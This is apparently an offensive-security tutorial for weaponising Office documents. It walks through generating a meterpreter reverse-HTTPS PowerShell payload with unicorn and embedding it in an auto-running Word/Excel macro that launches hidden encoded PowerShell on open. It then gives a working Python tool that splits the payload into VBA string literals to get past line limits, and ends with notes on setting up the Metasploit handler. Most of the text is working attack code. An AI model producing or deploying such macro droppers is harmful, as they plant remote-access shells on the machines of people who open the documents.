How to generate a payload using Unicorn

Clone unicorn and change into its directory:

`$ git clone https://github.com/trustedsec/unicorn
$ cd unicorn`

Generate a PowerShell payload with unicorn (replace 8.8.8.8 and 443 with the address and port your handler will listen on):

`$ python unicorn.py windows/meterpreter/reverse_https 8.8.8.8 443
[*] Generating the payload shellcode. This could take a few seconds/minutes as we create the shellcode...
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create a listener.`

Your payload is now in powershell_attack.txt, and unicorn.rc contains the matching handler (start it with `msfconsole -r unicorn.rc`). Copy the PowerShell one-liner and paste it into the macro of your document.

When you paste the payload generated by unicorn into a macro, Microsoft Word/Excel may throw an error about the string (line) length, because VBA caps the length of a single line of code. You can work around it: break the string into multiple shorter substrings and concatenate them at run time. Your macro should then look like this:

`Sub Auto_Open()
    Dim exec As String
    ' The one-liner from powershell_attack.txt, cut into short literals
    str1 = "powershell -window hidden -e JABCAGMAVQA...ABBAGw"
    ...
    str31 = "UALgBHAGUAdABCA...2ADQAX"
    str32 = "ABXAGkAbgB...ADsAfQA="
    ' & is VBA's string concatenation operator (+ works too, but is ambiguous with numeric addition)
    exec = str1 & str2 & str3 & str4 & str5 & str6 & str7 & str8 & str9 & str10 & str11 & str12 & str13 & str14 & str15 & str16 & str17 & str18 & str19 & str20 & str21 & str22 & str23 & str24 & str25 & str26 & str27 & str28 & str29 & str30 & str31 & str32
    Shell exec
End Sub

Sub AutoOpen()
    Auto_Open
End Sub`

Defining both entry points matters because Word runs a macro named `AutoOpen` when a document is opened while Excel runs `Auto_Open`; with both present the same module fires in either application.
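Splitting a several-thousand-character one-liner by hand is tedious and error-prone. The script below is an added example written for this page, not part of unicorn or the original post. It reads the one-liner from powershell_attack.txt (or uses a constructed sample when run without arguments) and emits a macro that rebuilds the command from short string literals. It differs from the macro above in one respect: each piece is appended to `exec` directly rather than stored in str1..str32, so the final concatenation never grows into a single over-long line as the number of pieces increases. It also doubles any embedded double quote, which a VBA string literal requires. `VBA_MAX_LINE = 1023` is the VBA editor's per-line limit as assumed here, and the 200-character default chunk is an arbitrary choice; `recover_command` parses the generated macro back into the command so the split can be checked before the macro goes into a document.

```python
#!/usr/bin/env python3
"""Turn a long unicorn one-liner into an Office macro that rebuilds it from
short string literals, so the VBA editor does not reject it for line length."""
import re
import sys

# Assumed per-line limit of the VBA editor; lower it if your Office build complains.
VBA_MAX_LINE = 1023
PREFIX = '    exec = exec & "'   # every generated payload line starts with this
SUFFIX = '"'


def vba_escape(text: str) -> str:
    """A literal double quote inside a VBA string is written as two quotes."""
    return text.replace('"', '""')


def split_command(command: str, chunk_len: int = 200) -> list[str]:
    """Cut the command into fixed-size pieces. Escaping is done per piece
    afterwards, so a doubled quote can never straddle two pieces."""
    if chunk_len < 1:
        raise ValueError("chunk_len must be positive")
    # Worst case every character is a quote and doubles in length.
    if len(PREFIX) + 2 * chunk_len + len(SUFFIX) > VBA_MAX_LINE:
        raise ValueError("chunk_len too large for a single VBA line")
    return [command[i:i + chunk_len] for i in range(0, len(command), chunk_len)]


def build_macro(command: str, chunk_len: int = 200) -> str:
    """Emit the Auto_Open/AutoOpen pair, accumulating the command piece by piece.
    Accumulating into exec avoids one huge concatenation line, which would
    itself hit the VBA line limit once there are enough pieces."""
    lines = ["Sub Auto_Open()", "    Dim exec As String"]
    for piece in split_command(command, chunk_len):
        lines.append(f"{PREFIX}{vba_escape(piece)}{SUFFIX}")
    lines += [
        "    Shell exec, vbHide",   # vbHide: start the process without a visible window
        "End Sub",
        "",
        "Sub AutoOpen()",           # Word looks for AutoOpen, Excel for Auto_Open
        "    Auto_Open",
        "End Sub",
    ]
    return "\n".join(lines) + "\n"


# One payload line: the prefix, then a literal in which quotes appear doubled.
_LITERAL = re.compile(r'^\s*exec = exec & "((?:[^"]|"")*)"$', re.M)


def recover_command(macro: str) -> str:
    """Reassemble the original command from the macro text (round-trip check)."""
    return "".join(m.group(1).replace('""', '"') for m in _LITERAL.finditer(macro))


# Constructed sample standing in for the first line of powershell_attack.txt.
SAMPLE_COMMAND = "powershell -window hidden -e " + "JABCAGMAVQA" * 40


if __name__ == "__main__":
    # Usage: python split_macro.py powershell_attack.txt > macro.vba
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            cmd = fh.read().strip()
    else:
        cmd = SAMPLE_COMMAND
    macro = build_macro(cmd)
    assert recover_command(macro) == cmd, "split does not round-trip"
    sys.stdout.write(macro)
```

Redirect the output into a file and paste it into the document's VBA project. If unicorn's output ever contains double quotes, they survive the trip because `vba_escape` doubles them and `recover_command` undoes it, which the round-trip assertion in `__main__` verifies before anything is written.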

Sometimes a staged payload like the one above is the right choice, sometimes it is not. If you only need something small (for example you just want to drop an nc-like shell), you can use unicorn again: write your own PowerShell script, save it, and run:

`$ python unicorn.py <path to your script>`

This wraps your script into a one-liner to paste into your document's macro, in the same way as above.

Configuring Metasploit the right way

Start msfconsole inside a screen session, so the handler and any sessions survive a dropped SSH connection:

`screen msfconsole`

Enable logging in Metasploit so you do not miss anything later. `spool` writes everything shown in the console to a file; give it an absolute path if you want to be sure where it lands:

`msf > spool mylog.log`

Now let's make Metasploit a bit more talkative. Set at the top level (with no module selected) these options are global; put the same lines into ~/.msf4/msfconsole.rc to have them applied on every start:

`msf > set ConsoleLogging true
msf > set LogLevel 5
msf > set SessionLogging true
msf > set TimestampOutput true`

You can change your prompt, for example, to: